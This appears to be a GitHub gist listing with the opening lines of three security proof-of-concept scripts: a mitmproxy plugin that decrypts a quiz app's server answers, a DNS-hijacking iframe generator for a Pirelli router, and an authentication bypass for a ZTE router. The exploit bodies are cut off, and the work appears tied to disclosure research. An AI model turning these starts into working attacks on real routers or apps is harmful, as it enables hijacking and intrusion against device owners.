Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@zuBux
zuBux / quizdom.py
Created March 4, 2016 16:51
mitmproxy plugin for decrypting Quizdom's server answers
# For more information you can visit the relevant blog post https://projectzero.gr/en/2015/09/the-keys-to-the-quizdom/
# Sensitive data (keys,iv etc.) have been removed for obvious reasons
import json
from libmproxy.protocol.http import decoded
from aesdecr import AESCipher
from Crypto.Cipher import AES
from Crypto import Random
BS = 16
@zuBux
zuBux / pirelli_dnshijack.py
Created July 28, 2015 11:07
DNS Hijacking for Pirelli P.RG A4201G
#!/usr/bin/python
##PoC iframe generator for Pirelli P.RG A4201G
##DNS Hijacking by projectzero
##www.projectzero.gr
##Primary DNS
dns1 = "0.0.0.0"
dns1_split = dns1.split('.')
@zuBux
zuBux / zte_cwmp.py
Last active November 15, 2015 12:27
ZTE ZXHN H108L Authentication Bypass PoC
#!/usr/bin/python
import requests
acs_server = "http://<server>:<port>"
acs_user = "user"
acs_pass = "pass"
# Connection request parameters. When a request is made to the following URL,
# using the specified user/pass combination, router will connect back to the ACS server.